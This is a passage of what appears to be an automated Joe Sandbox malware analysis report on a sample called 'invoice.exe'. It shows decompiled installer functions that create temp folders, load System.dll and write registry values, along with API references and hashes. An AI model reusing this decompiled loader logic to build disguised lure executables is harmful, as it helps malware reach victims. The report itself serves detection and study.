							_t26 = lstrcatA(0x42a050, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

0x00405092
0x0040509e
0x004050a1
0x004050a7
0x004050b3
0x004050b6
0x004050b9
0x004050bf
0x004050bf
0x004050c5
0x004050cd
0x004050d0
0x004050ed
0x004050f1
0x004050fa
0x004050fa
0x00405104
0x0040510d
0x00405119
0x00405120
0x00405124
0x00405127
0x0040513a
0x00405148
0x00405148
0x0040514c
0x0040514e
0x00405151
0x00000000
0x00405151
0x004050d2
0x004050da
0x004050e2
0x004050e8
0x00000000
0x004050e8
0x004050e2
0x004050d0
0x0040515b

APIs

lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nstA9F8.tmp\System.dll,00000000,0041C028,767923A0,?,?,?,?,?,?,?,?,?,004030DC,00000000,?), ref: 004050C5
lstrlenA.KERNEL32(004030DC,Skipped: C:\Users\user\AppData\Local\Temp\nstA9F8.tmp\System.dll,00000000,0041C028,767923A0,?,?,?,?,?,?,?,?,?,004030DC,00000000), ref: 004050D5
lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nstA9F8.tmp\System.dll,004030DC,004030DC,Skipped: C:\Users\user\AppData\Local\Temp\nstA9F8.tmp\System.dll,00000000,0041C028,767923A0), ref: 004050E8
SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nstA9F8.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nstA9F8.tmp\System.dll), ref: 004050FA
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405120
SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040513A
SendMessageA.USER32(?,00001013,?,00000000), ref: 00405148

Strings

Skipped: C:\Users\user\AppData\Local\Temp\nstA9F8.tmp\System.dll, xrefs: 004050AC, 004050BE, 004050C4, 004050E7, 004050F3

Memory Dump Source

Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.8701257617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701345270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701752118.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_invoice.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID: Skipped: C:\Users\user\AppData\Local\Temp\nstA9F8.tmp\System.dll
API String ID: 2531174081-3733134521
Opcode ID: 6726e748f555af4487e9f26b6748d9644d7c6f8c225b3de0595c0d78e911238a
Instruction ID: 508789985144291932d060d6ef0b432b589b283746e8f0e3613f73f9cddaab2c
Opcode Fuzzy Hash: 6726e748f555af4487e9f26b6748d9644d7c6f8c225b3de0595c0d78e911238a
Instruction Fuzzy Hash: 9E217A71A00518BFDB119FA5CD85EDFBFA9EB05354F14807AF944AA290C6398A418F98

Uniqueness

Uniqueness Score: -1.00%

Function 00405552 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00405552(CHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x408374;
				_v36.Group = 0x408374;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x408364;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryA(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityA(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}

0x0040555d
0x00405561
0x00405564
0x0040556a
0x0040556e
0x00405572
0x0040557a
0x00405581
0x00405587
0x0040558e
0x00405595
0x0040559d
0x0040559f
0x00000000
0x0040559f
0x004055a9
0x004055b0
0x004055c6
0x00000000
0x00000000
0x00000000
0x004055c8
0x004055cc

APIs

CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405595
GetLastError.KERNEL32 ref: 004055A9
SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 004055BE
GetLastError.KERNEL32 ref: 004055C8

Strings

C:\Users\user\Desktop, xrefs: 00405552
C:\Users\user\AppData\Local\Temp\, xrefs: 00405578

Memory Dump Source

Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.8701257617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701345270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701752118.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_invoice.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
API String ID: 3449924974-26219170
Opcode ID: 5ed0d1f38f2075833211856a8ebf7d2689aced5b3dcb66e6179e3f4d9a7ce916
Instruction ID: d93b5df8f7ffc7c008eac1e7bdc238e6dcac3e6f5ce479452586b7e310885e58
Opcode Fuzzy Hash: 5ed0d1f38f2075833211856a8ebf7d2689aced5b3dcb66e6179e3f4d9a7ce916
Instruction Fuzzy Hash: 550108B1C00219EADF11DBA1CD047EFBFB9EF04354F00803AD545B6290D77896088FA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040628F Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040628F(intOrPtr _a4) {
				char _v292;
				int _t10;
				struct HINSTANCE__* _t14;
				void* _t16;
				void* _t21;

				_t10 = GetSystemDirectoryA( &_v292, 0x104);
				if(_t10 > 0x104) {
					_t10 = 0;
				}
				if(_t10 == 0 ||  *((char*)(_t21 + _t10 - 0x121)) == 0x5c) {
					_t16 = 1;
				} else {
					_t16 = 0;
				}
				_t5 = _t16 + 0x40a014; // 0x5c
				wsprintfA(_t21 + _t10 - 0x120, "%s%s.dll", _t5, _a4);
				_t14 = LoadLibraryExA( &_v292, 0, 8); // executed
				return _t14;
			}

0x004062a6
0x004062af
0x004062b1
0x004062b1
0x004062b5
0x004062c7
0x004062c1
0x004062c1
0x004062c1
0x004062cb
0x004062df
0x004062f3
0x004062fa

APIs

GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004062A6
wsprintfA.USER32 ref: 004062DF
LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004062F3

Strings

UXTHEME, xrefs: 00406298
%s%s.dll, xrefs: 004062D9
\, xrefs: 004062B7

Memory Dump Source

Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.8701257617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701345270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701752118.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_invoice.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%s.dll$UXTHEME$\
API String ID: 2200240437-4240819195
Opcode ID: 99878a05f639d6717cee7e73d8174e66263622090e4b33b6bcde024c159c7dc8
Instruction ID: 90c405808a5079913e9fc86ee6967ca4c100a0af48b71fe7beb271d56a4ee20c
Opcode Fuzzy Hash: 99878a05f639d6717cee7e73d8174e66263622090e4b33b6bcde024c159c7dc8
Instruction Fuzzy Hash: 89F0F630510609AADB15AB64DD0DFEB365CAB08304F1405BEA686F11C1EA78E9398B99

Uniqueness

Uniqueness Score: -1.00%

Function 00405B2D Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00405B2D(char _a4, intOrPtr _a6, CHAR* _a8) {
				char _t11;
				signed int _t12;
				int _t15;
				signed int _t17;
				void* _t20;
				CHAR* _t21;

				_t21 = _a4;
				_t20 = 0x64;
				while(1) {
					_t11 =  *0x40a3b4; // 0x61736e
					_t20 = _t20 - 1;
					_a4 = _t11;
					_t12 = GetTickCount();
					_t17 = 0x1a;
					_a6 = _a6 + _t12 % _t17;
					_t15 = GetTempFileNameA(_a8,  &_a4, 0, _t21); // executed
					if(_t15 != 0) {
						break;
					}
					if(_t20 != 0) {
						continue;
					}
					 *_t21 =  *_t21 & 0x00000000;
					return _t15;
				}
				return _t21;
			}

0x00405b31
0x00405b37
0x00405b38
0x00405b38
0x00405b3d
0x00405b3e
0x00405b41
0x00405b4b
0x00405b58
0x00405b5b
0x00405b63
0x00000000
0x00000000
0x00405b67
0x00000000
0x00000000
0x00405b69
0x00000000
0x00405b69
0x00000000

APIs

GetTickCount.KERNEL32 ref: 00405B41
GetTempFileNameA.KERNELBASE(?,?,00000000,?,?,00000006,00000008,0000000A), ref: 00405B5B

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405B30
"C:\Users\user\Desktop\invoice.exe", xrefs: 00405B2D
nsa, xrefs: 00405B38

Memory Dump Source

Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.8701257617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701345270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701752118.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_invoice.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: "C:\Users\user\Desktop\invoice.exe"$C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-2146673014
Opcode ID: 81a8a72dc23b4af90602e2553ee1124644ae594fa0167b908fb3a738e8e2aa10
Instruction ID: 439a7608ba980c1fff97265348ba0c774925dff8d33d3cb941cf273fff524f8a
Opcode Fuzzy Hash: 81a8a72dc23b4af90602e2553ee1124644ae594fa0167b908fb3a738e8e2aa10
Instruction Fuzzy Hash: B0F082363042086BDB108F66DD04B9B7BA9DF91750F14803BFA48AA280D6B4E9588799

Uniqueness

Uniqueness Score: -1.00%

Function 100016BD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 118
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E100016BD(void* __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				void _v36;
				struct HINSTANCE__* _t34;
				intOrPtr _t38;
				void* _t44;
				void* _t45;
				void* _t46;
				void* _t50;
				intOrPtr _t53;
				signed int _t57;
				signed int _t61;
				void* _t65;
				void* _t66;
				void* _t70;
				void* _t74;

				_t74 = __esi;
				_t66 = __edi;
				_t65 = __edx;
				 *0x1000405c = _a8;
				 *0x10004060 = _a16;
				 *0x10004064 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x10004038, E10001556);
				_push("true"); // executed
				_t34 = E10001A5D(); // executed
				_t50 = _t34;
				if(_t50 == 0) {
					L28:
					return _t34;
				} else {
					if( *((intOrPtr*)(_t50 + 4)) != 1) {
						E100021B0(_t50);
					}
					E100021FA(_t65, _t50);
					_t53 =  *((intOrPtr*)(_t50 + 4));
					if(_t53 == 0xffffffff) {
						L14:
						if(( *(_t50 + 0x810) & 0x00000004) == 0) {
							if( *((intOrPtr*)(_t50 + 4)) == 0) {
								_t34 = E100023D8(_t50);
							} else {
								_push(_t74);
								_push(_t66);
								_t12 = _t50 + 0x818; // 0x818
								_t57 = 8;
								memcpy( &_v36, _t12, _t57 << 2);
								_t38 = E10001559(_t50);
								_t15 = _t50 + 0x818; // 0x818
								_t70 = _t15;
								 *((intOrPtr*)(_t50 + 0x820)) = _t38;
								 *_t70 = 3;
								E100023D8(_t50);
								_t61 = 8;
								_t34 = memcpy(_t70,  &_v36, _t61 << 2);
							}
						} else {
							E100023D8(_t50);
							_t34 = GlobalFree(E10001266(E10001559(_t50)));
						}
						if( *((intOrPtr*)(_t50 + 4)) != 1) {
							_t34 = E1000239E(_t50);
							if(( *(_t50 + 0x810) & 0x00000040) != 0 &&  *_t50 == 1) {
								_t34 =  *(_t50 + 0x808);
								if(_t34 != 0) {
									_t34 = FreeLibrary(_t34);
								}
							}
							if(( *(_t50 + 0x810) & 0x00000020) != 0) {
								_t34 = E100014E2( *0x10004058);
							}
						}
						if(( *(_t50 + 0x810) & 0x00000002) != 0) {
							goto L28;
						} else {
							return GlobalFree(_t50);
						}
					}
					_t44 =  *_t50;
					if(_t44 == 0) {
						if(_t53 != 1) {
							goto L14;
						}
						E10002A9F(_t50);
						L12:
						_t50 = _t44;
						L13:
						goto L14;
					}
					_t45 = _t44 - 1;
					if(_t45 == 0) {
						L8:
						_t44 = E100027E4(_t53, _t50); // executed
						goto L12;
					}
					_t46 = _t45 - 1;
					if(_t46 == 0) {
						E10002587(_t50);
						goto L13;
					}
					if(_t46 != 1) {
						goto L14;
					}
					goto L8;
				}
			}

0x100016bd
0x100016bd
0x100016bd
0x100016c7
0x100016cf
0x100016dc
0x100016ea
0x100016ed
0x100016ef
0x100016f4
0x100016f9
0x1000180c
0x1000180c
0x100016ff
0x10001703
0x10001706
0x1000170b
0x1000170d
0x10001713
0x10001719
0x10001749
0x10001750
0x10001774
0x100017b3
0x10001776
0x10001776
0x10001777
0x1000177a
0x10001780
0x10001784
0x10001787
0x1000178c
0x1000178c
0x10001793
0x10001799
0x1000179f
0x100017ab
0x100017ac
0x100017af
0x10001752
0x10001753
0x10001768
0x10001768
0x100017bd
0x100017c0
0x100017cd
0x100017d4
0x100017dc
0x100017df
0x100017df
0x100017dc
0x100017ec
0x100017f4
0x100017f9
0x100017ec
0x10001801
0x00000000
0x10001803
0x00000000
0x10001804
0x10001801
0x1000171d
0x10001720
0x1000173e
0x00000000
0x00000000
0x10001741
0x10001746
0x10001746
0x10001748
0x00000000
0x10001748
0x10001722
0x10001723
0x1000172b
0x1000172c
0x00000000
0x1000172c
0x10001725
0x10001726
0x10001734
0x00000000
0x10001734
0x10001729
0x00000000
0x00000000
0x00000000
0x10001729

APIs

Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CC4
Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CC9
Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CCE

GlobalFree.KERNEL32(00000000), ref: 10001768
FreeLibrary.KERNEL32(?), ref: 100017DF
GlobalFree.KERNEL32(00000000), ref: 10001804

Part of subcall function 100021B0: GlobalAlloc.KERNEL32(00000040,7D8BEC45), ref: 100021E2

Part of subcall function 10002587: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,10001739,00000000), ref: 100025F9

Part of subcall function 10001559: lstrcpyA.KERNEL32(00000000,10004010,00000000,10001695,00000000), ref: 10001572

Strings

, xrefs: 100017E5

Memory Dump Source

Source File: 00000001.00000002.8818214645.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.8818183154.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.8818247570.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.8818279279.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10000000_invoice.jbxd

Similarity

API ID: Global$Free$Alloc$Librarylstrcpy
String ID:
API String ID: 1791698881-3916222277
Opcode ID: 87444a894296e8d40cc63a4c2e1c416a7af340e3bff12e61cd27f34ad68e5005
Instruction ID: 474564f2ddd1a30fda7ef2e88bb39d7445f8f4f5c00c78564696995dcbc9c57a
Opcode Fuzzy Hash: 87444a894296e8d40cc63a4c2e1c416a7af340e3bff12e61cd27f34ad68e5005
Instruction Fuzzy Hash: C4319E79408205DAFB41DF649CC5BCA37ECFB042D5F118465FA0A9A09EDF78A8858B60

Uniqueness

Uniqueness Score: -1.00%

Function 004023D0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 83%

			E004023D0(void* __eax, int __ebx, intOrPtr __edx) {
				void* _t18;
				void* _t19;
				int _t22;
				long _t23;
				int _t28;
				intOrPtr _t31;
				void* _t32;
				intOrPtr _t35;
				void* _t37;
				void* _t40;

				_t31 = __edx;
				_t28 = __ebx;
				_t35 =  *((intOrPtr*)(_t37 - 0x18));
				_t32 = __eax;
				 *(_t37 - 0x3c) =  *(_t37 - 0x14);
				 *(_t37 - 0x34) = E00402AC1(2);
				_t18 = E00402AC1(0x11);
				 *(_t37 - 4) = 1;
				_t19 = E00402B51(_t40, _t32, _t18, 2); // executed
				 *(_t37 + 8) = _t19;
				if(_t19 != __ebx) {
					_t22 = 0;
					if(_t35 == 1) {
						E00402AC1(0x23);
						_t22 = lstrlenA(0x40ac18) + 1;
					}
					if(_t35 == 4) {
						 *0x40ac18 = E00402A9F(3);
						 *((intOrPtr*)(_t37 - 0x80)) = _t31;
						_t22 = _t35;
					}
					if(_t35 == 3) {
						_t22 = E00402F81( *((intOrPtr*)(_t37 - 0x1c)), _t28, 0x40ac18, 0xc00);
					}
					_t23 = RegSetValueExA( *(_t37 + 8),  *(_t37 - 0x34), _t28,  *(_t37 - 0x3c), 0x40ac18, _t22); // executed
					if(_t23 == 0) {
						 *(_t37 - 4) = _t28;
					}
					_push( *(_t37 + 8));
					RegCloseKey();
				}
				 *0x42f4a8 =  *0x42f4a8 +  *(_t37 - 4);
				return 0;
			}

0x004023d0
0x004023d0
0x004023d0
0x004023d3
0x004023da
0x004023e4
0x004023e7
0x004023f0
0x004023f7
0x004023fe
0x00402401
0x00402407
0x00402411
0x00402415
0x00402420
0x00402420
0x00402424
0x0040242e
0x00402434
0x00402437
0x00402437
0x0040243b
0x00402447
0x00402447
0x00402458
0x00402460
0x00402462
0x00402462
0x00402465
0x0040253c
0x0040253c
0x00402954
0x00402960

APIs

lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nstA9F8.tmp,00000023,00000011,00000002), ref: 0040241B
RegSetValueExA.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nstA9F8.tmp,00000000,00000011,00000002), ref: 00402458
RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nstA9F8.tmp,00000000,00000011,00000002), ref: 0040253C

Strings

C:\Users\user\AppData\Local\Temp\nstA9F8.tmp, xrefs: 0040240C, 0040242E, 00402442, 0040244D

Memory Dump Source

Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.8701257617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701345270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701752118.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_invoice.jbxd

Similarity

API ID: CloseValuelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nstA9F8.tmp
API String ID: 2655323295-1192468162
Opcode ID: 0b155a889f0a1852a4c8b5c80891aed8b0995d715a5fa6eccbfd1d5d818aefb1
Instruction ID: f3bc197a49376025d104d1766b7c26e04d62aafcfa214307c08bf0afb556c6f3
Opcode Fuzzy Hash: 0b155a889f0a1852a4c8b5c80891aed8b0995d715a5fa6eccbfd1d5d818aefb1
Instruction Fuzzy Hash: AD117271F00215BEDF10AFA59E89A9E7A74DB54314F20403AF908B61D1CAB84D419B68

Uniqueness

Uniqueness Score: -1.00%

Function 00401FFD Relevance: 6.1, APIs: 4, Instructions: 73
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E00401FFD(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t18;
				struct HINSTANCE__* _t26;
				void* _t27;
				struct HINSTANCE__* _t30;
				CHAR* _t32;
				intOrPtr* _t33;
				void* _t34;

				_t27 = __ebx;
				asm("sbb eax, 0x42f4d8");
				 *(_t34 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x42f4a8 =  *0x42f4a8 +  *(_t34 - 4);
					return 0;
				}
				_t32 = E00402AC1(0xfffffff0);
				 *(_t34 + 8) = E00402AC1("true");
				if( *((intOrPtr*)(_t34 - 0x18)) == __ebx) {
					L3:
					_t18 = LoadLibraryExA(_t32, _t27, 8); // executed
					_t30 = _t18;
					if(_t30 == _t27) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
					if(_t33 == _t27) {
						E0040508C(0xfffffff7,  *(_t34 + 8));
					} else {
						 *(_t34 - 4) = _t27;
						if( *((intOrPtr*)(_t34 - 0x20)) == _t27) {
							 *_t33( *((intOrPtr*)(_t34 - 8)), 0x400, 0x430000, 0x40b81c, 0x40a000); // executed
						} else {
							E00401423( *((intOrPtr*)(_t34 - 0x20)));
							if( *_t33() != 0) {
								 *(_t34 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t34 - 0x1c)) == _t27 && E00403755(_t30) != 0) {
						FreeLibrary(_t30); // executed
					}
					goto L16;
				}
				_t26 = GetModuleHandleA(_t32); // executed
				_t30 = _t26;
				if(_t30 != __ebx) {
					goto L4;
				}
				goto L3;
			}

0x00401ffd
0x00401ffd
0x00402002
0x00402009
0x004020c4
0x00402237
0x00402237
0x00402951
0x00402954
0x00402960
0x00402960
0x00402018
0x00402022
0x00402025
0x00402034
0x00402038
0x0040203e
0x00402042
0x004020bd
0x00000000
0x004020bd
0x00402044
0x0040204d
0x00402051
0x00402095
0x00402053
0x00402056
0x00402059
0x00402089
0x0040205b
0x0040205e
0x00402067
0x00402069
0x00402069
0x00402067
0x00402059
0x0040209d
0x004020b2
0x004020b2
0x00000000
0x0040209d
0x00402028
0x0040202e
0x00402032
0x00000000
0x00000000
0x00000000

APIs

GetModuleHandleA.KERNELBASE(00000000,?,000000F0), ref: 00402028

Part of subcall function 0040508C: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nstA9F8.tmp\System.dll,00000000,0041C028,767923A0,?,?,?,?,?,?,?,?,?,004030DC,00000000,?), ref: 004050C5
Part of subcall function 0040508C: lstrlenA.KERNEL32(004030DC,Skipped: C:\Users\user\AppData\Local\Temp\nstA9F8.tmp\System.dll,00000000,0041C028,767923A0,?,?,?,?,?,?,?,?,?,004030DC,00000000), ref: 004050D5
Part of subcall function 0040508C: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nstA9F8.tmp\System.dll,004030DC,004030DC,Skipped: C:\Users\user\AppData\Local\Temp\nstA9F8.tmp\System.dll,00000000,0041C028,767923A0), ref: 004050E8
Part of subcall function 0040508C: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nstA9F8.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nstA9F8.tmp\System.dll), ref: 004050FA
Part of subcall function 0040508C: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405120
Part of subcall function 0040508C: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040513A
Part of subcall function 0040508C: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405148

LoadLibraryExA.KERNELBASE(00000000,?,00000008,?,000000F0), ref: 00402038
GetProcAddress.KERNEL32(00000000,?), ref: 00402048
FreeLibrary.KERNELBASE(00000000,00000000,000000F7,?,?,00000008,?,000000F0), ref: 004020B2

Memory Dump Source

Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.8701257617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701345270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701752118.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_invoice.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
String ID:
API String ID: 2987980305-0
Opcode ID: 344385d6562e94f53280d8f746c1f287a273f2558a62102750f58fdb2a953ff5
Instruction ID: 3b54ba627a5d3606a08c88bc2c88048367fe0e0edc5ddf34d35ff9eabd327fef
Opcode Fuzzy Hash: 344385d6562e94f53280d8f746c1f287a273f2558a62102750f58fdb2a953ff5
Instruction Fuzzy Hash: A721DB71A04225ABCF207FA48E49B6E7670AB14358F20413BFB11B62D0CBBD4942966E

Uniqueness

Uniqueness Score: -1.00%

Function 004015BB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E004015BB(char __ebx, void* __eflags) {
				void* _t13;
				int _t19;
				char _t21;
				void* _t22;
				char _t23;
				signed char _t24;
				char _t26;
				CHAR* _t28;
				char* _t32;
				void* _t33;

				_t26 = __ebx;
				_t28 = E00402AC1(0xfffffff0);
				_t13 = E00405996(_t28);
				_t30 = _t13;
				if(_t13 != __ebx) {
					do {
						_t32 = E00405928(_t30, 0x5c);
						_t21 =  *_t32;
